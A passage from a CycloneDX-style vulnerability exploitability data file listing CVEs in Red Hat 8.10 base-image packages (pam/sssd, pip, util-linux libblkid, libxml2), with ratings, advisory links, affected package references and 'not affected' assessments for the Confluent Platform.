          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-12610",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        825
      ],
      "description": "A flaw was found in sssd. When authenticating with a YubiKey, the SSSD PAM responder can crash due to a use-after-free vulnerability, where a memory pointer is incorrectly handled. A local attacker could exploit this flaw by manipulating smartcard or YubiKey contents, leading to a denial of service that disrupts authentication. This vulnerability also presents a potential for privilege escalation, although it is difficult to exploit.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-12610"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-12610"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490288"
        },
        {
          "url": "https://github.com/SSSD/sssd/issues/8796"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12610"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12610"
        }
      ],
      "published": "2026-06-30T10:16:34+00:00",
      "updated": "2026-06-30T20:08:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.3.1-39.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13346",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"
        }
      ],
      "cwes": [
        36
      ],
      "description": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13346"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13346"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14110"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13346"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13346"
        }
      ],
      "published": "2026-07-29T19:16:44+00:00",
      "updated": "2026-07-30T16:43:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-13595",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in the libblkid library of util-linux. During nested partition probing, the BSD, Minix, Solaris x86, and UnixWare partition probers cache a raw pointer to a parent partition entry in a dynamically allocated array. When subsequent partition additions cause the array to be reallocated, this pointer becomes stale, leading to a heap use-after-free read. An attacker who can present a crafted block device image (for example, via USB insertion or a loop-mounted disk image) can trigger this flaw without user interaction, as libblkid is invoked automatically by udev/udisks as root on block-device hot-plug events. This could lead to limited information disclosure or denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13595"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26573"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13595"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494101"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/c0186f14fbdb02f64c8e0ba701ce727ea764ff4c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13595"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13595"
        }
      ],
      "published": "2026-06-29T09:16:28+00:00",
      "updated": "2026-07-08T03:37:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
